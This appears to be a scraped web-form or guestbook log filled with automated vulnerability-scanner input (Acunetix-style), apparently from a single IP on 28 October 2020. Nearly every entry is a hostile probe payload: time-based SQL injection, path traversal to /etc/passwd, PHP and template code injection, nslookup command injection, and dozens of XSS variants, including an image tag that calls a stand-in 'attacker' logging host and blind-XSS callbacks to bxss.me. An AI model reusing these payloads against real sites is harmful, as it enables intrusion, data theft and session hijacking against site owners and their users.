e [116.113.93.82] 2020-10-28 22:22:26

1

e [/www.vulnweb.com] 2020-10-28 22:22:26

1

e [@@A9zQR] 2020-10-28 22:22:25

1

e [116.113.93.82] 2020-10-28 22:22:25

';print(md5(acunetix_wvs_security_test));$a='

e [116.113.93.82] 2020-10-28 22:22:25

1

e [116.113.93.82] 2020-10-28 22:22:25

create

e [116.113.93.82] 2020-10-28 22:22:25

1

e [1] 2020-10-28 22:22:24

1

e [116.113.93.82] 2020-10-28 22:22:24

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [116.113.93.82] 2020-10-28 22:22:24

;print(md5(acunetix_wvs_security_test));

e [116.113.93.82] 2020-10-28 22:22:24

1

e [\] 2020-10-28 22:22:23

1

e [116.113.93.82] 2020-10-28 22:22:23

testasp.vulnweb.com

e [116.113.93.82] 2020-10-28 22:22:23

1

e [1'"] 2020-10-28 22:22:22

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 22:22:22

1

e [116.113.93.82] 2020-10-28 22:22:22

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [116.113.93.82] 2020-10-28 22:22:21

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 22:22:21

http://hitV62PJfEDfP.bxss.me/

e [116.113.93.82] 2020-10-28 22:22:21

1

e [116.113.93.82] 2020-10-28 22:22:21

Http://testasp.vulnweb.com/t/fit.txt

e [create/.] 2020-10-28 22:22:21

1

e [116.113.93.82] 2020-10-28 22:22:20

HttP://testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 22:22:20

1

e [116.113.93.82] 2020-10-28 22:22:20

1

e [116.113.93.82] 2020-10-28 22:22:19

^(#$!@#$)(()))******

e [WEB-INF\web.xml] 2020-10-28 22:22:19

1

e [create] 2020-10-28 22:22:19

1

e [116.113.93.82] 2020-10-28 22:22:19

1some_inexistent_file_with_long_name.jpg

e [116.113.93.82] 2020-10-28 22:22:18

1

e [WEB-INF/web.xml] 2020-10-28 22:22:18

1

e [116.113.93.82] 2020-10-28 22:22:18

!(()&&!|*|*|

e [116.113.93.82] 2020-10-28 22:22:18

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [/WEB-INF/web.xml] 2020-10-28 22:22:17

1

e [116.113.93.82] 2020-10-28 22:22:17

)

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:22:17

1

e [http://hite0JAcK9MqX.bxss.me/] 2020-10-28 22:22:17

1

e [116.113.93.82] 2020-10-28 22:22:17

1

e [create] 2020-10-28 22:22:16

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 22:22:16

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:22:16

1

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 22:22:16

1

e [116.113.93.82] 2020-10-28 22:22:16

1

e [116.113.93.82] 2020-10-28 22:22:15

1

e [file:///etc/passwd] 2020-10-28 22:22:15

1

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 22:22:15

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 22:22:15

1

e [116.113.93.82] 2020-10-28 22:22:14

'"()

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 22:22:14

1

e [6DSijVbA'));select pg_sleep(6); -- ] 2020-10-28 22:22:14

1

e [116.113.93.82] 2020-10-28 22:22:14

Array

e [..] 2020-10-28 22:22:14

1

e [116.113.93.82] 2020-10-28 22:22:13

Array

e [116.113.93.82] 2020-10-28 22:22:13

Array

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 22:22:13

1

e [TpvgLP29');select pg_sleep(6); -- ] 2020-10-28 22:22:12

1

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 22:22:12

1

e [116.113.93.82] 2020-10-28 22:22:12

1&n949461=v927712

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 22:22:12

1

e [testasp.vulnweb.com] 2020-10-28 22:22:11

1

e [4hyTGk2y';select pg_sleep(6); -- ] 2020-10-28 22:22:11

1

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 22:22:11

1

e [116.113.93.82] 2020-10-28 22:22:10

12345'"\'\");|]*{ <>

e [116.113.93.82] 2020-10-28 22:22:10

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 22:22:10

1

e [UdiN6Owy'; waitfor delay '0:0:6' -- ] 2020-10-28 22:22:10

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 22:22:10

1

e [^(#$!@#$)(()))******] 2020-10-28 22:22:09

1

e [116.113.93.82] 2020-10-28 22:22:09

e [116.113.93.82] 2020-10-28 22:22:09

1

e [1 waitfor delay '0:0:6' -- ] 2020-10-28 22:22:09

1

e ['"()] 2020-10-28 22:22:09

1

e [!(()&&!|*|*|] 2020-10-28 22:22:08

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 22:22:08

1

e [116.113.93.82] 2020-10-28 22:22:08

1

e [Array] 2020-10-28 22:22:08

1

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 22:22:08

1

e [%2fetc%2fpasswd] 2020-10-28 22:22:07

1

e [)] 2020-10-28 22:22:07

1

e [116.113.93.82&n918841=v902358] 2020-10-28 22:22:07

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 22:22:07

1

e [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 22:22:07

1

e [116.113.93.82] 2020-10-28 22:22:06

1

e [/etc/passwd] 2020-10-28 22:22:06

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 22:22:06

1

e [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 22:22:06

1

e [116.113.93.82] 2020-10-28 22:22:06

1

e [116.113.93.82] 2020-10-28 22:22:06

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 22:22:05

1

e [if(now()=sysdate(),sleep(3),0)] 2020-10-28 22:22:05

1

e [116.113.93.82] 2020-10-28 22:22:05

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 22:22:04

1

e [116.113.93.82] 2020-10-28 22:22:04

1

e [116.113.93.82] 2020-10-28 22:22:04

${10000198+9999485}

e [116.113.93.82] 2020-10-28 22:22:03

&nslookup YDjonyJv&'\"`0&nslookup YDjonyJv&`'

e [116.113.93.82] 2020-10-28 22:22:03

1

e [-1" OR 2+401-401-1=0+0+0+1 -- ] 2020-10-28 22:22:03

1

e [Array] 2020-10-28 22:22:02

1

e [116.113.93.82] 2020-10-28 22:22:02

$(nslookup eFfkYvvp)

e [116.113.93.82] 2020-10-28 22:22:02

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [${9999094+9999366}] 2020-10-28 22:22:02

1

e [-1' OR 2+661-661-1=0+0+0+1 or '8AOn4NZR'='] 2020-10-28 22:22:02

1

e [116.113.93.82] 2020-10-28 22:22:01

set|set&set

e [Array] 2020-10-28 22:22:01

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 22:22:01

1

e [12345'"\'\");|]*{ <>] 2020-10-28 22:22:00

1

e [116.113.93.82] 2020-10-28 22:22:00

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 22:21:59

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 22:21:59

1

e [116.113.93.82] 2020-10-28 22:21:59

"+response.write(9335302*9449530)+"

e [-1' OR 2+898-898-1=0+0+0+1 -- ] 2020-10-28 22:21:59

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 22:21:58

1

e [116.113.93.82] 2020-10-28 22:21:58

'+response.write(9335302*9449530)+'

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 22:21:57

1

e [116.113.93.82] 2020-10-28 22:21:57

Fa9CqHQm

e [116.113.93.82] 2020-10-28 22:21:57

response.write(9335302*9449530)

e [-1 OR 2+228-228-1=0+0+0+1] 2020-10-28 22:21:57

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 22:21:56

1

e [] 2020-10-28 22:21:56

1

e [-1 OR 2+650-650-1=0+0+0+1 -- ] 2020-10-28 22:21:56

1

e [&nslookup qBlQi5sx&'\"`0&nslookup qBlQi5sx&`'] 2020-10-28 22:21:55

1

e [kwpznPiC] 2020-10-28 22:21:55

1

e [Hhi85Lds] 2020-10-28 22:21:55

1

e [$(nslookup iY1jEF3L)] 2020-10-28 22:21:54

1

e [116.113.93.82] 2020-10-28 22:21:53

1

e [set|set&set] 2020-10-28 22:21:53

1

e ["+response.write(9306432*9832687)+"] 2020-10-28 22:21:53

1

e ['+response.write(9306432*9832687)+'] 2020-10-28 22:21:52

1

e [116.113.93.82] 2020-10-28 22:21:51

1

e [response.write(9306432*9832687)] 2020-10-28 22:21:50

1

e [116.113.93.82] 2020-10-28 22:19:28

1

e [116.113.93.82] 2020-10-28 22:00:58

1

e [116.113.93.82] 2020-10-28 22:00:54

1<NDRjHK<

e [116.113.93.82] 2020-10-28 22:00:51

1<img sRc='http://attacker-9276/log.php?

e [116.113.93.82] 2020-10-28 22:00:48

1<TCqDzv x=9373>

e [116.113.93.82] 2020-10-28 22:00:45

1<ifRAme sRc=9857.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:00:42

1<WGVHKO>JBEJQ[!+!]</WGVHKO>

e [116.113.93.82] 2020-10-28 22:00:38

16ck0i <ScRiPt >EsfD(9396)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:35

1<% contenteditable onresize=EsfD(9650)>

e [116.113.93.82] 2020-10-28 22:00:32

1}body{acu:Expre/**/SSion(EsfD(9542))}

e [116.113.93.82] 2020-10-28 22:00:29

1<img<!-- --> src=x onerror=alert(9625);//><!-- -->

e [116.113.93.82] 2020-10-28 22:00:25

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:00:23

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:00:19

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:00:16

1<input autofocus onfocus=EsfD(9832)>

e [116.113.93.82] 2020-10-28 22:00:13

e [116.113.93.82] 2020-10-28 22:00:10

1<ScRiPt>EsfD(9011)</sCripT>

e [116.113.93.82] 2020-10-28 22:00:06

1\u003CScRiPt\EsfD(9152)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:00:04

%31%3C%53%63%52%69%50%74%20%3E%45%73%66%44%289567%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:00:00

1<img/src=">" onerror=alert(9611)>

e [116.113.93.82] 2020-10-28 21:59:57

1<img src=xyz OnErRor=EsfD(9354)>

e [116.113.93.82] 2020-10-28 21:59:54

1<img src=//testasp.vulnweb.com/t/dot.gif onload=EsfD(9214)>

e [116.113.93.82] 2020-10-28 21:59:50

1<body onload=EsfD(9931)>

e [116.113.93.82] 2020-10-28 21:59:48

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9260'>

e [116.113.93.82] 2020-10-28 21:59:45

1<isindex type=image src=1 onerror=EsfD(9666)>

e [116.113.93.82] 2020-10-28 21:59:42

1<svg

e [116.113.93.82] 2020-10-28 21:59:38

1<video><source onerror="javascript:EsfD(9331)">

e [116.113.93.82] 2020-10-28 21:59:35

1<ScRiPt >EsfD(9981)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:32

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9714></ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:28

1<ScRiPt >EsfD(9641)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:25

1<ScR<ScRiPt>IpT>EsfD(9869)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 21:59:23

1<script>EsfD(9467)</script>

e [116.113.93.82] 2020-10-28 21:59:19

1<WLON3E>9QAK4[!+!]</WLON3E>

e [116.113.93.82] 2020-10-28 21:59:15

1<ScRiPt >EsfD(9168)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:12

{{10000039*10000145}}

e [116.113.93.82] 2020-10-28 21:59:09

acux6836

e [116.113.93.82] 2020-10-28 21:59:05

acu10423<s1﹥s2ʺs3ʹuca10423

e [116.113.93.82] 2020-10-28 21:59:03

19695400

e [116.113.93.82] 2020-10-28 21:58:59

'"()&%<acx><ScRiPt >EsfD(9997)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:58:55

1'"()&%<acx><ScRiPt >EsfD(9456)</ScRiPt>

e [116.113.93.82<naUYnj<] 2020-10-28 21:58:48

1

e [116.113.93.82<img sRc='http://attacker-9497/log.php?] 2020-10-28 21:58:45

1

e [116.113.93.82<iIs6y2 x=9988>] 2020-10-28 21:58:42

1

e [116.113.93.82<ifRAme sRc=9311.com></IfRamE>] 2020-10-28 21:58:38

1

e [116.113.93.82<WYULSK>LP0H5[!+!]</WYULSK>] 2020-10-28 21:58:35

1

e [116.113.93.82R0W4e <ScRiPt >EsfD(9154)</ScRiPt>] 2020-10-28 21:58:32

1

e [116.113.93.82<% contenteditable onresize=EsfD(9256)>] 2020-10-28 21:58:29

1

e [116.113.93.82}body{acu:Expre/**/SSion(EsfD(9376))}] 2020-10-28 21:58:26

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9276);//><!-- -->] 2020-10-28 21:58:23

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 21:58:20

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 21:58:16

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 21:58:13

1

e [116.113.93.82<input autofocus onfocus=EsfD(9982)>] 2020-10-28 21:58:10

1

e [] 2020-10-28 21:58:07

1

e [116.113.93.82<ScRiPt>EsfD(9933)</sCripT>] 2020-10-28 21:58:04

1

e [116.113.93.82\u003CScRiPt\EsfD(9820)\u003C/sCripT\u003E] 2020-10-28 21:58:01

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%45%73%66%44%289136%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 21:57:58

1

e [116.113.93.82<img/src=">" onerror=alert(9420)>] 2020-10-28 21:57:55

1

e [116.113.93.82<img src=xyz OnErRor=EsfD(9924)>] 2020-10-28 21:57:53

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=EsfD(9992)>] 2020-10-28 21:57:49

1

e [116.113.93.82<body onload=EsfD(9235)>] 2020-10-28 21:57:46

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9944'>] 2020-10-28 21:57:43

1

e [116.113.93.82<isindex type=image src=1 onerror=EsfD(9946)>] 2020-10-28 21:57:40

1

e [116.113.93.82<svg ] 2020-10-28 21:57:37

1

e [116.113.93.82<video><source onerror="javascript:EsfD(9274)">] 2020-10-28 21:57:34

1

e [116.113.93.82] 2020-10-28 21:57:32

1

e [116.113.93.82] 2020-10-28 21:57:31

WEB-INF\web.xml

e [116.113.93.82<ScRiPt >EsfD(9440)</ScRiPt>] 2020-10-28 21:57:31

1

e [116.113.93.82] 2020-10-28 21:57:30

1

e [116.113.93.82] 2020-10-28 21:57:30

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:57:29

dPJv0fSA'));select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:57:28

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:57:28

1mgCQRQG');select pg_sleep(9); --

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9076></ScRiPt>] 2020-10-28 21:57:27

1

e [116.113.93.82] 2020-10-28 21:57:27

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 21:57:27

sf3V8eES';select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:57:26

file:///etc/passwd

e [116.113.93.82] 2020-10-28 21:57:25

-1));select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:57:25

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82<ScRiPt >EsfD(9375)</ScRiPt>] 2020-10-28 21:57:25

1

e [116.113.93.82] 2020-10-28 21:57:24

-1);select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:57:24

..

e [116.113.93.82] 2020-10-28 21:57:24

-1;select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:57:24

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 21:57:23

XuyI3sZP'; waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:57:23

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82<ScR<ScRiPt>IpT>EsfD(9426)</sCr<ScRiPt>IpT>] 2020-10-28 21:57:22

1

e [116.113.93.82] 2020-10-28 21:57:22

1 waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:57:22

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 21:57:20

-1); waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:57:20

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 21:57:20

-1; waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:57:19

/etc/passwd

e [116.113.93.82] 2020-10-28 21:57:18

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

e [116.113.93.82<script>EsfD(9729)</script>] 2020-10-28 21:57:18

1

e [116.113.93.82] 2020-10-28 21:57:18

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 21:57:17

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

e [116.113.93.82] 2020-10-28 21:57:17

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:57:16

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

e [116.113.93.82] 2020-10-28 21:57:16

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82<WSXQDG>DHIVK[!+!]</WSXQDG>] 2020-10-28 21:57:15

1

e [116.113.93.82] 2020-10-28 21:57:15

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:57:15

if(now()=sysdate(),sleep(6),0)

e [116.113.93.82] 2020-10-28 21:57:14

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 21:57:14

-1" OR 2+634-634-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:57:13

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 21:57:13

-1' OR 2+817-817-1=0+0+0+1 or 'U5YsMIEM'='

e [116.113.93.82<ScRiPt >EsfD(9826)</ScRiPt>] 2020-10-28 21:57:13

1

e [116.113.93.82] 2020-10-28 21:57:13

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 21:57:12

-1' OR 2+951-951-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:57:11

-1 OR 2+955-955-1=0+0+0+1

e [116.113.93.82] 2020-10-28 21:57:10

e [116.113.93.82] 2020-10-28 21:57:10

-1 OR 2+426-426-1=0+0+0+1 --

e [{{10000021*10000123}}] 2020-10-28 21:57:10

1

e [116.113.93.82] 2020-10-28 21:57:09

e [116.113.93.82] 2020-10-28 21:57:09

bdhAJhJ1

e [116.113.93.82] 2020-10-28 21:57:08

JyI=

e [116.113.93.82] 2020-10-28 21:57:08

1

e [116.113.93.82] 2020-10-28 21:57:07

@@N1veW

e [116.113.93.82] 2020-10-28 21:57:06

1

e [acux9316] 2020-10-28 21:57:06

1

e [116.113.93.82] 2020-10-28 21:57:05

1

e [116.113.93.82] 2020-10-28 21:57:05

\

e [116.113.93.82] 2020-10-28 21:57:04

1'"

e [acu4241<s1﹥s2ʺs3ʹuca4241] 2020-10-28 21:57:03

1

e [116.113.93.829759129] 2020-10-28 21:57:00

1

e [116.113.93.82] 2020-10-28 21:57:00

<!--

e [116.113.93.82] 2020-10-28 21:56:59

'"

e [116.113.93.82] 2020-10-28 21:56:57

${@print(md5(acunetix_wvs_security_test))}\

e ['"()&%<acx><ScRiPt >EsfD(9323)</ScRiPt>] 2020-10-28 21:56:57

1

e [116.113.93.82] 2020-10-28 21:56:56

${@print(md5(acunetix_wvs_security_test))}

e [] 2020-10-28 21:56:55

1

e [<!--] 2020-10-28 21:56:55

1

e [116.113.93.82] 2020-10-28 21:56:55

";print(md5(acunetix_wvs_security_test));$a="

e [116.113.93.82] 2020-10-28 21:56:55

create/.

e [] 2020-10-28 21:56:54

1

e [116.113.93.82'"()&%<acx><ScRiPt >EsfD(9323)</ScRiPt>] 2020-10-28 21:56:54

1

e ['"] 2020-10-28 21:56:54

1

e [116.113.93.82] 2020-10-28 21:56:54

';print(md5(acunetix_wvs_security_test));$a='

e [116.113.93.82] 2020-10-28 21:56:54

create

e [JyI=] 2020-10-28 21:56:54

1

e [116.113.93.82] 2020-10-28 21:56:54

/www.vulnweb.com

e [116.113.93.82] 2020-10-28 21:56:53

;print(md5(acunetix_wvs_security_test));

e [116.113.93.82] 2020-10-28 21:56:53

create

e [@@GYaQ0] 2020-10-28 21:56:53

1

e [116.113.93.82] 2020-10-28 21:56:53

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [116.113.93.82] 2020-10-28 21:56:52

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:56:52

http://hit6TXLuUQb0Q.bxss.me/

e [1] 2020-10-28 21:56:52

1

e [/www.vulnweb.com] 2020-10-28 21:56:51

1

e [116.113.93.82] 2020-10-28 21:56:51

HttP://testasp.vulnweb.com/t/xss.html?%00

e [WEB-INF\web.xml] 2020-10-28 21:56:51

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 21:56:50

1

e [\] 2020-10-28 21:56:50

1

e [WEB-INF/web.xml] 2020-10-28 21:56:49

1

e [http://hitr1McCUQmKS.bxss.me/] 2020-10-28 21:56:49

1

e [1'"] 2020-10-28 21:56:49

1

e [create/.] 2020-10-28 21:56:49

1

e [116.113.93.82] 2020-10-28 21:56:48

testasp.vulnweb.com

e [/WEB-INF/web.xml] 2020-10-28 21:56:48

1

e [create] 2020-10-28 21:56:47

1

e [116.113.93.82] 2020-10-28 21:56:47

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:56:47

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 21:56:47

1

e [116.113.93.82] 2020-10-28 21:56:47

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 21:56:46

1

e [116.113.93.82] 2020-10-28 21:56:46

^(#$!@#$)(()))******

e [create] 2020-10-28 21:56:46

1

e [file:///etc/passwd] 2020-10-28 21:56:46

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:56:46

1

e [116.113.93.82] 2020-10-28 21:56:46

1

e [116.113.93.82] 2020-10-28 21:56:46

Http://testasp.vulnweb.com/t/fit.txt

e [116.113.93.82] 2020-10-28 21:56:45

'"()

e [116.113.93.82] 2020-10-28 21:56:45

!(()&&!|*|*|

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 21:56:45

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 21:56:45

1

e [o3w4U4np'));select pg_sleep(3); -- ] 2020-10-28 21:56:45

1

e [116.113.93.82] 2020-10-28 21:56:45

1some_inexistent_file_with_long_name.jpg

e [116.113.93.82] 2020-10-28 21:56:44

Array

e [..] 2020-10-28 21:56:44

1

e [116.113.93.82] 2020-10-28 21:56:44

)

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 21:56:44

1

e [116.113.93.82] 2020-10-28 21:56:44

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [dQiUNOEo');select pg_sleep(3); -- ] 2020-10-28 21:56:44

1

e [116.113.93.82] 2020-10-28 21:56:43

1

e [116.113.93.82] 2020-10-28 21:56:43

Array

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 21:56:43

1

e [kCqMyHrJ';select pg_sleep(9); -- ] 2020-10-28 21:56:43

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 21:56:43

1

e [116.113.93.82] 2020-10-28 21:56:43

Array

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 21:56:42

1

e [oAMLgBNx'; waitfor delay '0:0:9' -- ] 2020-10-28 21:56:42

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 21:56:42

1

e [116.113.93.82] 2020-10-28 21:56:41

12345'"\'\");|]*{ <>

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 21:56:41

1

e ['"()] 2020-10-28 21:56:41

1

e [1 waitfor delay '0:0:9' -- ] 2020-10-28 21:56:41

1

e [116.113.93.82] 2020-10-28 21:56:41

1&n955688=v987569

e [116.113.93.82] 2020-10-28 21:56:40

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 21:56:40

1

e [Array] 2020-10-28 21:56:40

1

e [%2fetc%2fpasswd] 2020-10-28 21:56:40

1

e [^(#$!@#$)(()))******] 2020-10-28 21:56:40

1

e [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 21:56:39

1

e [!(()&&!|*|*|] 2020-10-28 21:56:39

1

e [/etc/passwd] 2020-10-28 21:56:39

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 21:56:38

1

e [)] 2020-10-28 21:56:37

1

e [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 21:56:37

1

e [testasp.vulnweb.com] 2020-10-28 21:56:37

1

e [116.113.93.82] 2020-10-28 21:56:37

&nslookup 6NrtgIwR&'\"`0&nslookup 6NrtgIwR&`'

e [116.113.93.82&n926059=v928792] 2020-10-28 21:56:36

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 21:56:36

1

e [if(now()=sysdate(),sleep(9),0)] 2020-10-28 21:56:36

1

e [116.113.93.82] 2020-10-28 21:56:36

$(nslookup 5RVdsEDV)

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 21:56:36

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 21:56:35

1

e [-1" OR 2+374-374-1=0+0+0+1 -- ] 2020-10-28 21:56:35

1

e [116.113.93.82] 2020-10-28 21:56:35

"+response.write(9917702*9045824)+"

